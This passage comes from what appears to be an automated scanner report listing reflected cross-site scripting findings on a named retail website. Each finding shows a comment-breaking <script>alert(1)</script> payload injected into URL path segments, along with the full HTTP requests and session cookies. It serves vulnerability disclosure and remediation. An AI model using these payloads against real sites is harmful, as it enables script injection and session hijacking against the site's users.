Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: 5BD6HKwSrSgAAF3TGJ4AAAAs
REDIRECT_SCRIPT_URL: /includescd1bc--><script>alert(1)</script>6e9c8a53a22/cm/cmtaggingservices_TTA_top.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/includescd1bc-->
...[SNIP]...

1.13. http://www.territoryahead.com/includes/cm/cmtaggingservices_TTA_top.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/includes/cm/cmtaggingservices_TTA_top.js

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 5fe53--><script>alert(1)</script>b80f84d5127 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes/cm5fe53--><script>alert(1)</script>b80f84d5127/cmtaggingservices_TTA_top.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:17:28 GMT
Server: Apache
ETag: "AAAAS53+8Eg"
Last-Modified: Wed, 02 Mar 2011 19:11:51 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...

Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: w4PmLawSrRQAAHbd-PkAAAAU
REDIRECT_SCRIPT_URL: /includes/cm5fe53--><script>alert(1)</script>b80f84d5127/cmtaggingservices_TTA_top.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/includes/cm5fe53-->
...[SNIP]...

1.14. http://www.territoryahead.com/includes/cm/cmtaggingservices_TTA_top.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/includes/cm/cmtaggingservices_TTA_top.js

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 52cc1--><script>alert(1)</script>d72ed3d7b91 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes/cm/cmtaggingservices_TTA_top.js52cc1--><script>alert(1)</script>d72ed3d7b91 HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:17:30 GMT
Server: Apache
ETag: "AAAAS53+8nW"
Last-Modified: Wed, 02 Mar 2011 19:11:53 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: w6ZaiKwSrRQAABCYmxIAAAAW
REDIRECT_SCRIPT_URL: /includes/cm/cmtaggingservices_TTA_top.js52cc1--><script>alert(1)</script>d72ed3d7b91
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/includes/cm/cmtaggingservices_TTA_top.js52cc1-->
...[SNIP]...

1.15. http://www.territoryahead.com/includes/flyopen.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/includes/flyopen.js

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 6da5d--><script>alert(1)</script>b2e7355efaa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes6da5d--><script>alert(1)</script>b2e7355efaa/flyopen.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:24:46 GMT
Server: Apache
ETag: "AAAAS53+hIw"
Last-Modified: Wed, 02 Mar 2011 19:10:00 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: 3Z8dxqwSrSgAAEGJaxgAAAAq
REDIRECT_SCRIPT_URL: /includes6da5d--><script>alert(1)</script>b2e7355efaa/flyopen.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/includes6da5d-->
...[SNIP]...

1.16. http://www.territoryahead.com/includes/flyopen.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/includes/flyopen.js

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload fc741--><script>alert(1)</script>de7cf9e5952 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes/flyopen.jsfc741--><script>alert(1)</script>de7cf9e5952 HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:15:43 GMT
Server: Apache
ETag: "AAAAS53+ikQ"
Last-Modified: Wed, 02 Mar 2011 19:10:06 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
kie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: vUnTmqwSrRQAAFi69mAAAACx
REDIRECT_SCRIPT_URL: /includes/flyopen.jsfc741--><script>alert(1)</script>de7cf9e5952
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/includes/flyopen.jsfc741-->
...[SNIP]...

1.17. http://www.territoryahead.com/includes/global_stylesheet.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/includes/global_stylesheet.css

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 1fe21--><script>alert(1)</script>7c4d4ef1df3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes1fe21--><script>alert(1)</script>7c4d4ef1df3/global_stylesheet.css HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:24:47 GMT
Server: Apache
ETag: "AAAAS53+hYl"
Last-Modified: Wed, 02 Mar 2011 19:10:01 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: 3a6TZqwSrSgAAB1Ei4kAAAAO
REDIRECT_SCRIPT_URL: /includes1fe21--><script>alert(1)</script>7c4d4ef1df3/global_stylesheet.css
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/includes1fe21-->
...[SNIP]...

1.18. http://www.territoryahead.com/includes/global_stylesheet.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/includes/global_stylesheet.css

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 917c4--><script>alert(1)</script>89015f79c43 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes/global_stylesheet.css917c4--><script>alert(1)</script>89015f79c43 HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:15:44 GMT
Server: Apache
ETag: "AAAAS53+i18"
Last-Modified: Wed, 02 Mar 2011 19:10:07 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: vVtb@6wSrRQAAC9kmpMAAAAN
REDIRECT_SCRIPT_URL: /includes/global_stylesheet.css917c4--><script>alert(1)</script>89015f79c43
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/includes/global_stylesheet.css917c4-->
...[SNIP]...

1.19. http://www.territoryahead.com/includes/rollover.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/includes/rollover.js

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload c4f83--><script>alert(1)</script>fa0e3cf38e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includesc4f83--><script>alert(1)</script>fa0e3cf38e0/rollover.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:15:38 GMT
Server: Apache
ETag: "AAAAS53+hX0"
Last-Modified: Wed, 02 Mar 2011 19:10:01 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: vP@njawSrRQAAFhQzKgAAAA7
REDIRECT_SCRIPT_URL: /includesc4f83--><script>alert(1)</script>fa0e3cf38e0/rollover.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/includesc4f83-->
...[SNIP]...

1.20. http://www.territoryahead.com/includes/rollover.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/includes/rollover.js

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload ebd43--><script>alert(1)</script>3e7cfa00cb5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes/rollover.jsebd43--><script>alert(1)</script>3e7cfa00cb5 HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:15:44 GMT
Server: Apache
ETag: "AAAAS53+i2F"
Last-Modified: Wed, 02 Mar 2011 19:10:07 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
ie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: vVuxdKwSrRQAAHbC-PQAAAAL
REDIRECT_SCRIPT_URL: /includes/rollover.jsebd43--><script>alert(1)</script>3e7cfa00cb5
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/includes/rollover.jsebd43-->
...[SNIP]...

1.21. http://www.territoryahead.com/includes/stylesheet.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/includes/stylesheet.css

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload c35cb--><script>alert(1)</script>b622e254608 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includesc35cb--><script>alert(1)</script>b622e254608/stylesheet.css HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:24:47 GMT
Server: Apache
ETag: "AAAAS53+hX+"
Last-Modified: Wed, 02 Mar 2011 19:10:01 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: 3a3JsqwSrSgAAF3PGQcAAAAi
REDIRECT_SCRIPT_URL: /includesc35cb--><script>alert(1)</script>b622e254608/stylesheet.css
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/includesc35cb-->
...[SNIP]...

1.22. http://www.territoryahead.com/includes/stylesheet.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/includes/stylesheet.css

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 2d5df--><script>alert(1)</script>5599c52e0f1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes/stylesheet.css2d5df--><script>alert(1)</script>5599c52e0f1 HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:24:53 GMT
Server: Apache
ETag: "AAAAS53+i6W"
Last-Modified: Wed, 02 Mar 2011 19:10:08 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: 3g3blawSrSgAAAUBs64AAAAK
REDIRECT_SCRIPT_URL: /includes/stylesheet.css2d5df--><script>alert(1)</script>5599c52e0f1
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/includes/stylesheet.css2d5df-->
...[SNIP]...

1.23. http://www.territoryahead.com/menu/milonic_src.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/menu/milonic_src.js

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 6569c--><script>alert(1)</script>a940dcc002b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu6569c--><script>alert(1)</script>a940dcc002b/milonic_src.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:16:21 GMT
Server: Apache
ETag: "AAAAS53+rpS"
Last-Modified: Wed, 02 Mar 2011 19:10:43 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: v4GyqawSrRQAAE0Z@yUAAAAa
REDIRECT_SCRIPT_URL: /menu6569c--><script>alert(1)</script>a940dcc002b/milonic_src.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/menu6569c-->
...[SNIP]...

1.24. http://www.territoryahead.com/menu/milonic_src.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/menu/milonic_src.js

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 57d86--><script>alert(1)</script>dbe9b3c16fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/milonic_src.js57d86--><script>alert(1)</script>dbe9b3c16fb HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:25:31 GMT
Server: Apache
ETag: "AAAAS53+sGo"
Last-Modified: Wed, 02 Mar 2011 19:10:45 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
kie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: 4Ex5C6wSrSgAAGQksboAAAAa
REDIRECT_SCRIPT_URL: /menu/milonic_src.js57d86--><script>alert(1)</script>dbe9b3c16fb
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/menu/milonic_src.js57d86-->
...[SNIP]...

1.25. http://www.territoryahead.com/menu/mmenudom.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/menu/mmenudom.js

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 7cc17--><script>alert(1)</script>f66506f27e5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu7cc17--><script>alert(1)</script>f66506f27e5/mmenudom.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:16:57 GMT
Server: Apache
ETag: "AAAAS53+0mk"
Last-Modified: Wed, 02 Mar 2011 19:11:20 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: wbGP7qwSrRQAAA17c1gAAAAf
REDIRECT_SCRIPT_URL: /menu7cc17--><script>alert(1)</script>f66506f27e5/mmenudom.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/menu7cc17-->
...[SNIP]...

1.26. http://www.territoryahead.com/menu/mmenudom.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/menu/mmenudom.js

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload fdcb5--><script>alert(1)</script>6b6b99bd582 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/mmenudom.jsfdcb5--><script>alert(1)</script>6b6b99bd582 HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:16:59 GMT
Server: Apache
ETag: "AAAAS53+1IM"
Last-Modified: Wed, 02 Mar 2011 19:11:22 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
